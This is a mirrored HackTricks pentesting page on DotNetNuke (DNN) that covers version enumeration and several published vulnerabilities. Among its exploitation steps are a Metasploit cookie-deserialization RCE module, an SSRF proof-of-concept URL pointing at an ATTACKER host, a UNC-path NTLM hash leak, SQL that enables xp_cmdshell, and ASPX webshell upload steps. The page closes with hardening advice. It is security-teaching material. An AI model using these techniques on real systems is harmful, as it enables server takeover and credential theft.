maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

101 lines
4.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
## DotNetNuke (DNN)
If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.
---
## Version & Environment Enumeration
* Check the *X-DNN* HTTP response header it usually discloses the exact platform version.
* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
* Typical cookies you will see on a live instance:
* `.DOTNETNUKE` ASP.NET forms authentication ticket.
* `DNNPersonalization` contains XML/serialized user profile data (old versions see RCE below).
---
## Unauthenticated Exploitation
### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)
*Affected versions ≤ 9.3.0-RC*
`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.
```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
```
The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x9.1.x and with a *verified* low-privilege account on 9.2.x+.
### 2. Server-Side Request Forgery (CVE-2025-32372)
*Affected versions < 9.13.8 Patch released April 2025*
A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF). Practical impacts:
* Internal port scan / metadata service discovery in cloud deployments.
* Reach hosts otherwise firewalled from the Internet.
Proof-of-concept (replace `TARGET` & `ATTACKER`):
```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```
The request is triggered in the background; monitor your listener for callbacks.
### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)
*Affected versions 6.0.0 9.x (< 10.0.1)*
Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to **10.0.1** or disable outbound SMB at the firewall.
### 4. IP Filter Bypass (CVE-2025-52487)
If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario.
---
## Post-Authentication to RCE
### Via SQL console
Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```
### Via ASPX webshell upload
1. Go to **`Settings → Security → More → More Security Settings`**.
2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.
---
## Privilege Escalation on Windows
Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:
* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.
---
## Hardening Recommendations (Blue Team)
* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
* Remove residual **`InstallWizard.aspx*`** files after installation.
* Disable outbound SMB (ports 445/139) egress.
* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
* Block access to `/API/RemoteContentProxy` if unused.
## References
* Metasploit `dnn_cookie_deserialization_rce` module documentation practical unauthenticated RCE details (GitHub).
* GitHub Security Advisory GHSA-3f7v-qx94-666m 2025 SSRF bypass & patch information.
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink